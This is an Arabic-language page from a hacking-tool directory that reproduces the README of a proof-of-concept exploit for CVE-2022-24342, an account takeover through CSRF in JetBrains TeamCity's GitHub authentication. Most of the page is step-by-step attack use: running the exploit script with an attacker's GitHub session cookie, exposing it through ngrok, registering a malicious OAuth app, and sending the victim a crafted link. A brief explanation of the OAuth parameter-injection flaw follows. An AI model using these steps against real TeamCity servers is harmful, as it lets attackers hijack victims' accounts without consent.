Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2022-24342 — PoC لـ CVE-2022-24342: الاستيلاء على الحساب عبر CSRF في مصادقة GitHub | Kitploit
أدوات/GitHubGitHub/yuriisanin/cve-2022-24342
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقالمصادقةالفريق الأحمر
GitHubyuriisanin/cve-2022-24342

CVE-2022-24342

PoC لـ CVE-2022-24342: الاستيلاء على الحساب عبر CSRF في مصادقة GitHub

عرض المستودع
3772منذ 4 سنواتتمت المراجعة من قبل Kitploit

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2022-24342

JetBrains TeamCity - استيلاء على الحساب عبر CSRF في مصادقة GitHub (PoC)

  • CVE-2022-24342
    • المتطلبات
    • الاستخدام
    • كيف يعمل؟
      • GitHub OAuth2: ترتيب معالجة معاملات الاستعلام
      • CVE-2022-24342: تدفق طلبات HTTP

المتطلبات

  • JetBrains TeamCity <2021.2.1
  • تفعيل مصادقة GitHub

الاستخدام

  1. حاول تسجيل الدخول بحساب GitHub الخاص بالمهاجم إلى نسخة TeamCity المستهدفة لجعل تطبيق GitHub الخاص بـ TeamCity مخوَّلاً.

  2. قم بالتثبيت والتشغيل:

root@kitploit:~
$ git clone https://github.com/yuriisanin/CVE-2022-24342
$ cd CVE-2022-24342/
$ pip3 install -r requirements.txt
$ python3 exploit.py -h

usage: exploit.py [-h] -s S [-p P]

optional arguments:
  -h, --help  show this help message and exit
  -s S        GitHub user session
  -p P        Uvicorn port

$ python3 exploit.py -s {attackers_github_session_cookie}

إذا قمت بتشغيل الأداة على جهازك المحلي، قد تحتاج إلى استخدام Ngrok أو بدائل.

root@kitploit:~
$ ngrok http 8000
  1. أنشئ تطبيق GitHub OAuth2:
root@kitploit:~
homepage: "http://{exploit-host}:8000"
authorization callback url: "http://{exploit-host}:8000/callback"
  1. أرسل الرابط التالي إلى الضحية:
root@kitploit:~
http://{exploit-host}:8000/exploit?target_host=http://{target-host}&gh_client_id={github_oauth_client_id}

عرض توضيحي:

CVE-2022-24342 Demo

كيف يعمل؟

كانت TeamCity عرضة لحقن معاملات الاستعلام أثناء تدفق OAuth2، مما سمح للمهاجم بإعادة توجيه المستخدم إلى أي تطبيق GitHub OAuth2، واعتراض معامل state الصالح، وربط أي حساب GitHub بحساب الضحية على TeamCity.

كان ذلك ممكنًا بسبب الأمور التالية:

  • ترتيب معالجة معاملات الاستعلام في GitHub OAuth2
  • حقن معاملات الاستعلام في TeamCity

GitHub OAuth2: ترتيب معالجة معاملات الاستعلام

github-oauth-parameters-processing

CVE-2022-24342: تدفق طلبات HTTP

requests-flow

الدعم

يمكنك متابعتي على Twitter أو GitHub أو YouTube.

تنزيل الأداة